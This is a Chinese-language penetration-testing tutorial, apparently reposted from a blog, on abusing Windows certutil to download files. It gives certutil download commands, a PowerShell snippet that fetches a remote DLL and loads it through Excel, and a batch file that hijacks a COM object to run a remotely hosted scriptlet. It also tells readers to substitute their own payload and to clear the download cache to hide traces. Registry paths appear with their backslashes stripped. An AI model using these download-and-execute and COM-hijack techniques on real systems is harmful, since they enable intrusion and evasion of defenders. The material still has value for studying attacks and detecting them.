certutil在滲透測測試中的使用技巧

0x01 前言

最近在Casey Smith‏ @subTee的twitter上學(xué)到了關(guān)于certutil的一些利用技巧。本文將結(jié)合自己的一些經(jīng)驗，介紹certutil在滲透測試中的應(yīng)用，對cmd下downloader的實現(xiàn)方法作補充。

0x02 certutil簡介

用于備份證書服務(wù)管理,支持xp-win10

更多操作說明見https://technet.microsoft.com/zh-cn/library/cc755341(v=ws.10).aspx

0x03 滲透測試中的應(yīng)用

1、downloader

(1) 保存在當前路徑，文件名稱和下載文件名稱相同

certutil  -urlcache  -split  -f  https://github.com/backlion/demo/blob/master/weblogic.py

(2) 保存在當前路徑，指定保存文件名稱

certutil  -urlcache  -split  -f   https://github.com/backlion/demo/blob/master/weblogic.py  test.py

(3) 保存在緩存目錄，名稱隨機

緩存目錄位置：%USERPROFILE%AppDataLocalLowMicrosoftCryptnetUrlCacheContent

certutil  -urlcache   -f   https://github.com/backlion/demo/blob/master/weblogic.py

2、清除下載文件副本方法

（1） 方法一，直接刪除緩存目錄對應(yīng)文件

如下圖:

（2）方法二，命令行:

certutil  -urlcache   -f   https://github.com/backlion/demo/blob/master/weblogic.py delete

（3） 補充：

查看緩存項目：

certutil.exe -urlcache *

如下圖

3、實際測試

(1) powershell中的利用

測試系統(tǒng)安裝Office軟件，下載執(zhí)行dll對應(yīng)的powershell代碼如下：

$path="D:	estmsg1.dll"

certutil.exe -urlcache -split -f https://raw.githubusercontent.com/3gstudent/test/master/msg.dll  $path

$excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application"))

$excel.RegisterXLL($path)

測試如下圖

(2) 下載劫持com的sct的批處理文件

test.bat(這里批處理是利用到certutil下載sct文件劫持com彈出計算器）：

@echo off

reg add HKEY_CURRENT_USERSOFTWAREClassesBandit.1.00 /ve /t REG_SZ /d Bandit /f 1>nul 2>&1

reg add HKEY_CURRENT_USERSOFTWAREClassesBandit.1.00CLSID /ve /t REG_SZ /d {00000001-0000-0000-0000-0000FEEDACDC} /f 1>nul 2>&1

reg add HKEY_CURRENT_USERSOFTWAREClassesBandit /ve /t REG_SZ /d Bandit /f 1>nul 2>&1

reg add HKEY_CURRENT_USERSOFTWAREClassesBanditCLSID /ve /t REG_SZ /d {00000001-0000-0000-0000-0000FEEDACDC} /f 1>nul 2>&1

reg add HKEY_CURRENT_USERSOFTWAREClassesCLSID{00000001-0000-0000-0000-0000FEEDACDC} /ve /t REG_SZ /d Bandit /f 1>nul 2>&1

reg add HKEY_CURRENT_USERSOFTWAREClassesCLSID{00000001-0000-0000-0000-0000FEEDACDC}InprocServer32 /ve /t REG_SZ /d C:WINDOWSsystem32scrobj.dll /f 1>nul 2>&1

reg add HKEY_CURRENT_USERSOFTWAREClassesCLSID{00000001-0000-0000-0000-0000FEEDACDC}InprocServer32 /v ThreadingModel  /t REG_SZ /d Apartment /f 1>nul 2>&1

reg add HKEY_CURRENT_USERSOFTWAREClassesCLSID{00000001-0000-0000-0000-0000FEEDACDC}ProgID /ve /t REG_SZ /d Bandit.1.00 /f 1>nul 2>&1

reg add HKEY_CURRENT_USERSOFTWAREClassesCLSID{00000001-0000-0000-0000-0000FEEDACDC}ScriptletURL /ve /t REG_SZ /d https://gist.githubusercontent.com/enigma0x3/64adf8ba99d4485c478b67e03ae6b04a/raw/a006a47e4075785016a62f7e5170ef36f5247cdb/test.sct /f 1>nul 2>&1

reg add HKEY_CURRENT_USERSOFTWAREClassesCLSID{00000001-0000-0000-0000-0000FEEDACDC}VersionIndependentProgID /ve /t REG_SZ /d Bandit /f 1>nul 2>&1

reg add HKEY_CURRENT_USERSOFTWAREClassesCLSID{372FCE38-4324-11D0-8810-00A0C903B83C}TreatAs /ve /t REG_SZ /d {00000001-0000-0000-0000-0000FEEDACDC} /f 1>nul 2>&1

certutil 1>nul 2>&1

reg delete HKEY_CURRENT_USERSOFTWAREClassesBandit.1.00 /f 1>nul 2>&1

reg delete HKEY_CURRENT_USERSOFTWAREClassesBandit /f 1>nul 2>&1

reg delete HKEY_CURRENT_USERSOFTWAREClassesCLSID{00000001-0000-0000-0000-0000FEEDACDC} /f 1>nul 2>&1

reg delete HKEY_CURRENT_USERSOFTWAREClassesCLSID{372FCE38-4324-11D0-8810-00A0C903B83C}TreatAs /f 1>nul 2>&1

echo Done!

這里測試的test.scr:

注意：在實戰(zhàn)中需要替換該批處理文件中地址:

https://gist.githubusercontent.com/enigma0x3/64adf8ba99d4485c478b67e03ae6b04a/raw/a006a47e4075785016a62f7e5170ef36f5247cdb/test.sct為你自己需要的sct（劫持com）文件

運行批處理如下：

4、計算文件hash

(1) SHA1

certutil  -hashfile msg1.dll

(2) SHA256：

certutil  -hashfile msg1.dll SHA256

(3) MD5：

certutil  -hashfile msg1.dll MD5

5、base64編碼轉(zhuǎn)換

(1) base64編碼：

CertUtil -encode InFile OutFile

(2) base64解碼

CertUtil -decode InFile OutFile

注：

編碼后的文件會添加兩處標識信息：

文件頭：

-----BEGIN CERTIFICATE-----

文件尾：

-----END CERTIFICATE-----

如下圖

0x04 downloader常用方法

常用的cmd下downloader方法，相比來說，利用certUtil簡便快捷，但是使用后需要注意清除緩存，路徑如下：

%USERPROFILE%AppDataLocalLowMicrosoftCryptnetUrlCacheContent

downloader常用方法如下：

· certUtil

· powershell

· csc

· vbs

· JScript

· hta

· bitsadmin

· wget

· debug

· ftp

· ftfp

0x05 小結(jié)

本文介紹了certutil在滲透測試中的應(yīng)用，詳細介紹利用certutil作downloader的實現(xiàn)方法和檢測方法

轉(zhuǎn)載引用來自于：https://3gstudent.github.io

總結(jié)

以上是生活随笔為你收集整理的certutil在渗透测测试中的使用技巧的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。